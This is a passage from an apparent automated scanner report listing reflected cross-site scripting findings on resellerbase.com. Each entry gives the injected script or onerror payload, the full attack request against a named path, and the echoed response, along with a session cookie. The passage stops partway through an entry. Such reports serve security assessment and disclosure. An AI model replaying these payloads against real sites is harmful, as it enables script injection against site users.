Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f42a81<a>a61c54a0b66 was not found on this server.</p>
...[SNIP]...

2.5113. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f8d4<script>alert(1)</script>aa186feca8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service1f8d4<script>alert(1)</script>aa186feca8d/other/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1f8d4<script>alert(1)</script>aa186feca8d/other/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5114. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae62a<script>alert(1)</script>b6c6890eedc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherae62a<script>alert(1)</script>b6c6890eedc/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherae62a<script>alert(1)</script>b6c6890eedc/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5115. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd48c<script>alert(1)</script>f491b86b74d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/googlepr.phpdd48c<script>alert(1)</script>f491b86b74d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.phpdd48c<script>alert(1)</script>f491b86b74d was not found on this server.</p>
...[SNIP]...

2.5116. http://www.resellerbase.com/web-service/other/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 7e8a1<a>60907ddd55c was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/googlepr.php?link_id=97e8a1<a>60907ddd55c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.php?link_id=97e8a1<a>60907ddd55c was not found on this server.</p>
...[SNIP]...

2.5117. http://www.resellerbase.com/web-service/other/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2034a<script>alert(1)</script>97d81d1569a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/googlepr.php?2034a<script>alert(1)</script>97d81d1569a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.php?2034a<script>alert(1)</script>97d81d1569a=1 was not found on this server.</p>
...[SNIP]...

2.5118. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ecc6d<script>alert(1)</script>90c3de35c28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceecc6d<script>alert(1)</script>90c3de35c28/other/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceecc6d<script>alert(1)</script>90c3de35c28/other/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5119. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0bbf<script>alert(1)</script>f6f86395cde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherb0bbf<script>alert(1)</script>f6f86395cde/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherb0bbf<script>alert(1)</script>f6f86395cde/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5120. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b62f<script>alert(1)</script>58cea916372 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/search.php6b62f<script>alert(1)</script>58cea916372?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php6b62f<script>alert(1)</script>58cea916372?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5121. http://www.resellerbase.com/web-service/other/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3a271<a>90e0a5d4c3d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search3a271<a>90e0a5d4c3d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search3a271<a>90e0a5d4c3d&opt=2 was not found on this server.</p>
...[SNIP]...

2.5122. http://www.resellerbase.com/web-service/other/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dfd4"><img%20src%3da%20onerror%3dalert(1)>8f841d807e9 was submitted in the cat parameter. This input was echoed as 5dfd4\"><img src=a onerror=alert(1)>8f841d807e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/other/search.php?cat=185dfd4"><img%20src%3da%20onerror%3dalert(1)>8f841d807e9&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=185dfd4\"><img src=a onerror=alert(1)>8f841d807e9">
...[SNIP]...

2.5123. http://www.resellerbase.com/web-service/other/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac00"><img%20src%3da%20onerror%3dalert(1)>aa349ac4626e241c9 was submitted in the cat parameter. This input was echoed as dac00\"><img src=a onerror=alert(1)>aa349ac4626e241c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/other/search.php?cat=18dac00"><img%20src%3da%20onerror%3dalert(1)>aa349ac4626e241c9&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 32301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=18dac00\"><img src=a onerror=alert(1)>aa349ac4626e241c9">
...[SNIP]...

2.5124. http://www.resellerbase.com/web-service/other/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 16f76<a>3ac7529c360 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/search.php?keyword=search...16f76<a>3ac7529c360&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...16f76<a>3ac7529c360&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5125. http://www.resellerbase.com/web-service/other/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cead3<script>alert(1)</script>3a81778d85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search&opt=2&cead3<script>alert(1)</script>3a81778d85b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search&opt=2&cead3<script>alert(1)</script>3a81778d85b=1 was not found on this server.</p>
...[SNIP]...

2.5126. http://www.resellerbase.com/web-service/other/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6ff9a<a>1762aeba8f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search&opt=26ff9a<a>1762aeba8f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search&opt=26ff9a<a>1762aeba8f1 was not found on this server.</p>
...[SNIP]...

2.5127. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bbf7<script>alert(1)</script>813ddf17fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8bbf7<script>alert(1)</script>813ddf17fd1/other/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8bbf7<script>alert(1)</script>813ddf17fd1/other/themes/ was not found on this server.</p>
...[SNIP]...

2.5128. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91f57<script>alert(1)</script>7992606690e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other91f57<script>alert(1)</script>7992606690e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other91f57<script>alert(1)</script>7992606690e/themes/ was not found on this server.</p>
...[SNIP]...

2.5129. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7a6a<script>alert(1)</script>c94f9201f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesc7a6a<script>alert(1)</script>c94f9201f3c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesc7a6a<script>alert(1)</script>c94f9201f3c/ was not found on this server.</p>
...[SNIP]...

2.5130. http://www.resellerbase.com/web-service/other/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f534<script>alert(1)</script>3ed971fff1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/?1f534<script>alert(1)</script>3ed971fff1c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/?1f534<script>alert(1)</script>3ed971fff1c=1 was not found on this server.</p>
...[SNIP]...

2.5131. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
